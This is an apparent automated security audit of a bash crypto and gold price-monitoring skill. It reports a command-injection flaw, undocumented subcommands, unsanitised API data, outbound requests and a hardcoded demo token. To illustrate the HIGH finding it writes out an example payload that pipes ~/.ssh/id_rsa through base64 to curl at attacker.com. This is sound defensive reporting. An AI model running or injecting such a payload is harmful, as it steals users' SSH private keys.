Is franky0617/crypto-gold-monitor safe?
https://github.com/openclaw/skills/tree/main/skills/franky0617/crypto-gold-monitor
The crypto-gold-monitor skill is a bash-based price monitoring tool whose primary security concern is a shell command injection vulnerability in the cmd_update subcommand, where unvalidated user arguments are interpolated into a double-quoted shell string enabling arbitrary code execution. The skill also overstates its capabilities in SKILL.md by documenting eight subcommands that do not exist in the implementation, which will cause confusion for any AI agent relying on the documentation. Canary file integrity was confirmed intact and the installation itself was clean with no unexpected network or filesystem activity attributable to the skill.
Category Scores
Findings (6)
HIGH Shell Command Injection via Unvalidated cmd_update Arguments -35 ▶
The cmd_update function assigns the first two positional arguments to $gold and $silver without any type-checking, regex validation, or quoting, then interpolates them inside a double-quoted echo string. Bash performs full command substitution inside double quotes, meaning a value like $(cat ~/.ssh/id_rsa | base64 | curl -s -d @- https://attacker.com/) would execute at shell expansion time. Any vector that causes the agent to call 'crypto-monitor update
MEDIUM Documented Commands Not Implemented in Script -15 ▶
SKILL.md advertises subcommands btc, eth, crypto, gold, silver, metals, compare, rankings, alert, and --interval. The actual case statement in crypto-monitor.sh only handles: all|a, update|up, refresh|r, help|--help|-h. Any agent following the documentation will invoke undefined commands that exit with error code 1, producing unhelpful output and potentially causing retry loops or hallucinated tool responses.
MEDIUM Inline python3 Execution with API-Derived Data Feeding Shell Variables -15 ▶
API response data is parsed via python3 -c 'import sys,json; print(...)' and the printed value assigned to shell variables. Those variables are then used unquoted in bc arithmetic expressions and heredoc blocks. While json.load() prevents JSON-level injection, a compromised upstream API or DNS rebinding attack could return crafted numeric strings. The silver estimation uses 'echo "scale=2; $gold / 85" | bc' with $gold unquoted, and the metals heredoc interpolates all four variables without sanitization.
LOW Multiple Outbound HTTP Requests to Four External Domains -10 ▶
The script unconditionally calls four external price APIs on each invocation: api.exchangerate-api.com, api.coingecko.com, www.goldapi.io, and query1.finance.yahoo.com. While the current request URLs contain no user data, the pattern establishes outbound connectivity from the agent host. A modified version of this skill, or a future update, could append exfiltrated data to query parameters. API servers also observe the agent host's IP address and timing on every call.
LOW Hardcoded Demo API Token and Silent Fallback to Stub Prices -10 ▶
The GoldAPI.io request includes the header 'x-access-token: demo'. This shared credential will be rate-limited or rejected in production, causing the function to silently fall back to the hardcoded stub value of $2650 for gold. The skill provides no user-visible indication that stub prices are being served instead of live data, making it unreliable as a financial tool and potentially misleading.
INFO Clean Sparse Checkout from Legitimate Monorepo 0 ▶
Installation performed a shallow sparse checkout from https://github.com/openclaw/skills.git targeting only the skills/franky0617/crypto-gold-monitor subdirectory. Network activity was limited to GitHub (140.82.121.3:443) and the local DNS resolver. No unexpected processes spawned, no files written outside the skill directory, and the temporary clone was deleted after copying.